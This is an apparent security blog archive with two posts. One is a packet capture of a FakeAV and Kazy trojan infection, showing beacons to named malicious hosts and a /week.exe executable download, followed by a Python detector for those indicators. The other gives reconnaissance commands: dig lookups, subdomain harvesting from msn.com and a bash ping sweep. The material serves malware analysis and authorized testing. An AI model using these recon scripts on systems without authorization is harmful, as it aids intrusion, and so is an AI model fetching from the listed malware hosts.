Monthly Archives: June 2016

Traffic Sample PCAP of FakeAV Malware and Kazy Trojan Downloader

Two key indicators:

FakeAV POST – POST /hrrgkkwhjdwwwww/order.php?pid=390 (attempting to set up a payment for the FakeAV, with the pid linking to the current session)

Trojan Downloader function – GET /week.exe HTTP/1.1

2015-08-27 11:39:35.045855 ARP, Request who-has 192.168.56.1 tell 192.168.56.10, length 28
2015-08-27 11:39:35.046218 ARP, Reply 192.168.56.1 is-at 0a:00:27:00:00:00, length 46
2015-08-27 11:39:35.046432 IP 192.168.56.10.59725 > 8.8.8.8.53: 60725+ A? microsoft.com. (31)
2015-08-27 11:39:35.063594 IP 8.8.8.8.53 > 192.168.56.10.59725: 60725 2/0/0 A 134.170.188.221, A 134.170.185.46 (63)
2015-08-27 11:39:35.096336 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [S], seq 759739050, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2015-08-27 11:39:35.150435 IP 134.170.188.221.80 > 192.168.56.10.49240: Flags [S.], seq 4248410354, ack 759739051, win 8190, options [mss 1460,nop,wscale 4,nop,nop,sackOK], length 0
2015-08-27 11:39:35.150683 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [.], ack 1, win 256, length 0
2015-08-27 11:39:35.150905 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [F.], seq 1, ack 1, win 256, length 0
2015-08-27 11:39:35.181327 IP6 fe80::b094:423d:bad5:e23c.61490 > ff02::1:3.5355: UDP, length 28
2015-08-27 11:39:35.183294 IP 192.168.56.10.63629 > 224.0.0.252.5355: UDP, length 28
2015-08-27 11:39:35.205418 IP 134.170.188.221.80 > 192.168.56.10.49240: Flags [F.], seq 1, ack 2, win 511, length 0
2015-08-27 11:39:35.205529 IP 192.168.56.10.49240 > 134.170.188.221.80: Flags [.], ack 2, win 256, length 0
2015-08-27 11:39:35.291613 IP6 fe80::b094:423d:bad5:e23c.61490 > ff02::1:3.5355: UDP, length 28
2015-08-27 11:39:35.291891 IP 192.168.56.10.63629 > 224.0.0.252.5355: UDP, length 28
2015-08-27 11:39:37.828655 IP 192.168.56.10.52622 > 8.8.8.8.53: 9094+ A? vh86987.eurodir.ru. (36)
2015-08-27 11:39:38.066602 IP 8.8.8.8.53 > 192.168.56.10.52622: 9094 1/0/0 A 46.30.40.95 (52)
2015-08-27 11:39:38.969072 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [S], seq 1389821042, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2015-08-27 11:39:39.090116 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [S.], seq 2866732242, ack 1389821043, win 14600, options [mss 1460,nop,nop,sackOK,nop,wscale 9], length 0
2015-08-27 11:39:39.090503 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [.], ack 1, win 16425, length 0
2015-08-27 11:39:39.092478 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [P.], seq 1:359, ack 1, win 16425, length 358: HTTP: POST /hrrgkkwhjdwwwww/order.php?pid=390 HTTP/1.1
POST /hrrgkkwhjdwwwww/order.php?pid=390 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: vh86987.eurodir.ru
Content-Length: 966
Cache-Control: no-cache
2015-08-27 11:39:39.092812 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [P.], seq 359:1325, ack 1, win 16425, length 966: HTTP
..(_.Y.PR…….P.@)….eimwae=88789850&gmsekqci=16FF0EB00EA6433310B324B2F7&iqym=70AFD9C6AD22E1E3A0F45B4858441F2400042818E925A56C2F84731B45B0C8633BCF8C5C32D9CFD1461B4996588285DC361C3F38D767DCD186A4F22F6A1E605011AC39E9376815EDFBC9E2358D04CA9B862F3412BD50237F4394C1360B49FDC57AD69F9B90888161EDA880C787A0B046D9564542F8612123866D348695899174B59EFF623413D96BDE9C297B0F88F081E65D539E25C2C5A72C730662927FCB9B84189B97&kueueo1=61F04BC27EF021C250F01EC245F003C243F01CC266F010C256F010C27EF014C25AF001C24EF01EC250F014C250F02DC24DF01CC25BF01DC241F000C249F002C255F05FC247F009C247F0&kueueo2=44F018C250F014C244F01EC25AF05FC247F009C247F0&kueueo3=72F022C272F024C260F026C271F05CC272F032C27EF021C271F021C277F033C275F022C2&kueueo4=6BF01FC256F014C24EF059C270F058C202F029C247F01EC24CF059C270F058C202F032C272F024C202F034C211F05CC213F043C210F044C202F007C211F051C262F051C211F05FC210F041C265F039C258F0&kueueo5=74F018C250F005C257F010C24EF033C24DF009C202F036C250F010C252F019C24BF012C251F051C263F015C243F001C256F014C250F0
2015-08-27 11:39:39.213414 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [.], ack 359, win 31, length 0
2015-08-27 11:39:39.213445 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [.], ack 1325, win 35, length 0
2015-08-27 11:39:39.282319 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [P.], seq 1:350, ack 1325, win 35, length 349: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 27 Aug 2015 15:39:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.42

[chunked response body: one 0xa4-byte (164-byte) chunk of binary data, omitted, followed by the terminating 0 chunk]
2015-08-27 11:39:39.478157 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [.], ack 350, win 16337, length 0
2015-08-27 11:39:44.332404 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [P.], seq 1325:2068, ack 350, win 16337, length 743: HTTP: POST /hrrgkkwhjdwwwww/order.php HTTP/1.1
POST /hrrgkkwhjdwwwww/order.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: vh86987.eurodir.ru
Content-Length: 393
Cache-Control: no-cache

qgwm=7D30747F51F23222258A85AEAA8F38429F&ocqesgui=27258430&skcume=16290CA72D61C87DD39A110902ED31D2A44757B295E924EF5B8D42E53BE86B4170E0E3577743D0C1B86223D57598EA0166E96E7B06ADA2F14C37205259180DCB892E1B5B9B4F891A4042EB249E6F25DBC27C9D070224AB2D56E8E038FAC6FA9CE0E0C78D309452C9ABC349FCD11159B0D87E7307C29E5104B70DA601CD9C0CDE5A7881DFDEB9A8BB0F2AF4D4D51BD93B1EB30CB6C18A5780EC63223F1DF35BBFB789BFB0
2015-08-27 11:39:44.370298 IP 192.168.56.10.61985 > 8.8.8.8.53: 63530+ A? nowakdbo.bget.ru. (34)
2015-08-27 11:39:44.450567 IP6 fe80::b094:423d:bad5:e23c.57441 > ff02::1:3.5355: UDP, length 28
2015-08-27 11:39:44.451157 IP 192.168.56.10.57321 > 224.0.0.252.5355: UDP, length 28
2015-08-27 11:39:44.453354 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [.], ack 2068, win 39, length 0
2015-08-27 11:39:44.473743 IP 46.30.40.95.80 > 192.168.56.10.49241: Flags [P.], seq 350:628, ack 2068, win 39, length 278: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 27 Aug 2015 15:39:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.42

[chunked response body: one 0x5d-byte (93-byte) chunk of binary data, omitted, followed by the terminating 0 chunk]
2015-08-27 11:39:44.558406 IP6 fe80::b094:423d:bad5:e23c.57441 > ff02::1:3.5355: UDP, length 28
2015-08-27 11:39:44.558725 IP 192.168.56.10.57321 > 224.0.0.252.5355: UDP, length 28
2015-08-27 11:39:44.611693 IP 8.8.8.8.53 > 192.168.56.10.61985: 63530 1/0/0 A 5.101.152.71 (50)
2015-08-27 11:39:44.750140 IP 192.168.56.10.49242 > 5.101.152.71.80: Flags [P.], seq 1:261, ack 1, win 16425, length 260: HTTP: GET /week.exe HTTP/1.1
GET /week.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: nowakdbo.bget.ru
Cache-Control: no-cache
2015-08-27 11:39:44.885681 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], ack 261, win 134, length 0
2015-08-27 11:39:44.885691 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 1:1461, ack 261, win 134, length 1460: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.9.4
Date: Thu, 27 Aug 2015 15:39:44 GMT
Content-Type: application/octet-stream
Content-Length: 237568
Last-Modified: Thu, 27 Aug 2015 13:45:36 GMT
Connection: keep-alive
Keep-Alive: timeout=30
ETag: “55df1480-3a000″
Expires: Sat, 26 Sep 2015 15:39:44 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

[response body: start of the 237568-byte week.exe download, beginning with an MZ/PE header ("This program cannot be run in DOS mode"); raw bytes omitted]
2015-08-27 11:39:44.885699 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 1461:2921, ack 261, win 134, length 1460: HTTP
2015-08-27 11:39:44.885705 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 2921:4381, ack 261, win 134, length 1460: HTTP
2015-08-27 11:39:57.937205 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 24821:26281, ack 261, win 134, length 1460: HTTP
2015-08-27 11:39:57.937321 IP 192.168.56.10.49242 > 5.101.152.71.80: Flags [.], ack 26281, win 16425, length 0
2015-08-27 11:40:01.992399 ARP, Request who-has 192.168.56.1 (0a:00:27:00:00:00) tell 192.168.56.10, length 28
2015-08-27 11:40:03.061681 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 26281:27741, ack 261, win 134, length 1460: HTTP
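As an added example (not part of the original post), a small Python detector that walks tcpdump -A style summary lines and HTTP headers and raises the two indicators above, plus the served PE body (MZ magic under application/octet-stream). The sample input is constructed from the capture above with the binary payload left out.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Constructed sample modelled on the tcpdump -A capture above (binary payload left out).
SAMPLE = """\
2015-08-27 11:39:39.092478 IP 192.168.56.10.49241 > 46.30.40.95.80: Flags [P.], seq 1:359, ack 1, win 16425, length 358: HTTP: POST /hrrgkkwhjdwwwww/order.php?pid=390 HTTP/1.1
Host: vh86987.eurodir.ru
2015-08-27 11:39:44.750140 IP 192.168.56.10.49242 > 5.101.152.71.80: Flags [P.], seq 1:261, ack 1, win 16425, length 260: HTTP: GET /week.exe HTTP/1.1
Host: nowakdbo.bget.ru
2015-08-27 11:39:44.885691 IP 5.101.152.71.80 > 192.168.56.10.49242: Flags [.], seq 1:1461, ack 261, win 134, length 1460: HTTP: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 237568

MZ......This program cannot be run in DOS mode.
"""
# tcpdump summary line that carries an HTTP request line or status line.
SUMMARY = re.compile(r"^\d{4}-\d\d-\d\d [\d:.]+ IP (\S+) > (\S+): .*?HTTP: (.+)$")

def messages(text):
    """Return [src, dst, start_line, headers, body_lines, headers_done] per HTTP message."""
    out = []
    for line in text.splitlines():
        m = SUMMARY.match(line)
        if m:
            out.append([m.group(1), m.group(2), m.group(3), {}, [], False])
        elif out:
            cur = out[-1]
            key, sep, val = line.partition(": ")
            if line.strip() and sep and not cur[5]:
                cur[3][key.lower()] = val.strip()
            else:  # a blank line or non-header text ends the header block
                cur[5] = True
                cur[4].extend([line] if line.strip() else [])
    return out

def detect(text):
    """Return (rule, src, dst, host, detail) for the order POST, the .exe GET and a served PE."""
    alerts = []
    for src, dst, start, hdrs, body, _ in messages(text):
        parts, host = start.split(), hdrs.get("host", "")
        if len(parts) == 3 and parts[2].startswith("HTTP/"):  # request line
            url = urlsplit(parts[1])
            pid = parse_qs(url.query).get("pid")
            if parts[0] == "POST" and url.path.endswith("/order.php") and pid:
                alerts.append(("fakeav-order", src, dst, host, "pid=" + pid[0]))
            if parts[0] == "GET" and url.path.lower().endswith(".exe"):
                alerts.append(("exe-download", src, dst, host, url.path))
        elif len(parts) > 1 and parts[0].startswith("HTTP/") and parts[1] == "200":
            octet = hdrs.get("content-type", "").startswith("application/octet-stream")
            if octet and body and body[0].startswith("MZ"):  # PE magic in an octet-stream body
                alerts.append(("pe-served", src, dst, host, hdrs.get("content-length", "?")))
    return alerts
```

Run it over `tcpdump -A -r sample.pcap` output to get the three alerts; the host field is empty for the response because only the request carries a Host header.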

Penetration Testing Reconnaissance Command Line Tricks: Dig, Mass Domain Resolution, Ping Sweeping

Here are some simple command line tricks to help with recon on your target network or host.
First, a simple way to resolve domain names automatically. It can be wrapped in a for loop to resolve a large list of domain names, and you can add a cron job that writes an .out file if you want to track changes in resolution over time. Start by setting a regular expression variable that extracts only legitimate IPv4 addresses from the output:
root@computersecurity:~/# IP='(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)'   # single-quoted so the shell does not parse the parentheses and pipes
Now use the variable to do a simple resolution and return only the IP address of the domain being resolved (Google's DNS server address, which dig prints in its own footer, is filtered out of the results):
root@computersecurity:~/# dig @8.8.8.8 computersecurity.org | grep -E -o "$IP" | grep -v 8.8.8.8
The raw output is just the IP:
104.238.84.235
Another easy way to profile a target is to download its homepage, extract all of the subdomains from it, and resolve them to IP addresses to map out the network infrastructure. Here is an example using the index page of msn.com:
root@computersecurity:~/# wget http://www.msn.com
–2016-06-25 00:52:45–  http://www.msn.com/
Resolving www.msn.com (www.msn.com)… 204.79.197.203
Connecting to www.msn.com (www.msn.com)|204.79.197.203|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 40206 (39K) [text/html]
Saving to: ‘index.html’
index.html          100%[===================>]  39.26K  –.-KB/s    in 0.01s
2016-06-25 00:52:45 (2.97 MB/s) – ‘index.html’ saved [40206/40206]
We run this simple command (straight quotes; the regex is anchored on a literal dot in msn.com):
root@computersecurity:~/# for url in $(grep -o '[A-Za-z0-9_.-]*\.*msn\.com' index.html | sort -u); do host "$url" | grep "has address" | cut -d" " -f4; done
137.117.100.176
65.52.108.11
104.85.61.237
204.79.197.200
40.114.54.223
204.79.197.203
Just like that, we see that msn.com has a lot of subdomains hosted all over the place.
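As an added example (not from the original post), the same extract-and-resolve step in Python. It goes a little beyond the grep above: both sides of the match are bounded so that names such as notmsn.com or msn.com.example are not taken for msn.com, and the resolver is injectable so the code runs offline. The HTML fragment and the address table are constructed.

```python
import re
import socket

# Constructed HTML fragment standing in for the saved index.html; the distractor
# names (notmsn.com, msn.com.example, msn-com.akamaized.net) are deliberate.
HTML = """<html><head><link href="//static-global-s-msn-com.akamaized.net/x.css">
<a href="https://www.msn.com/">home</a> <a href="http://www.notmsn.com/">not it</a>
<a href="http://msn.com.example/">lookalike</a> <a href="https://MSN.com">apex</a>
<a href="http://news.msn.com/story">news</a></head></html>"""

LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"  # one DNS label

def extract_hosts(html, apex):
    """Unique hostnames equal to or below apex, lower-cased and sorted. Both
    sides are bounded so a longer name that merely contains apex is skipped."""
    pat = re.compile(r"(?<![A-Za-z0-9.-])((?:%s\.)*%s)(?!\.?[A-Za-z0-9-])"
                     % (LABEL, re.escape(apex)), re.I)
    return sorted({m.group(1).lower() for m in pat.finditer(html)})

def resolve_hosts(hosts, resolver=socket.gethostbyname):
    """Map each host to an IPv4 address, or None when it does not resolve.
    The resolver is injectable (a dict's .get works) so this runs offline."""
    out = {}
    for host in hosts:
        try:
            out[host] = resolver(host)
        except OSError:  # socket.gaierror for NXDOMAIN, timeouts, etc.
            out[host] = None
    return out

if __name__ == "__main__":  # live run: resolves the extracted names with the system resolver
    for host, addr in resolve_hosts(extract_hosts(HTML, "msn.com")).items():
        print(host, addr)
```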
Once you have IP ranges and are authorized to touch them, a simple bash script can ping sweep a network in seconds. Here is a sweep of my own network completing in less than a second:

root@computersecurity:~/# cat > pingsweep.sh
#!/bin/bash
# Send one echo request to every host in parallel and print the addresses that answer.
for ip in $(seq 1 255); do
  ping -c 1 -W 1 192.168.1.$ip | grep "bytes from" | cut -d" " -f4 | cut -d":" -f1 &
done
wait   # let the background pings finish before the script exits
root@computersecurity:~/# chmod +x pingsweep.sh
root@computersecurity:~/# ./pingsweep.sh
192.168.1.1
192.168.1.2
192.168.1.101
192.168.1.100
192.168.1.107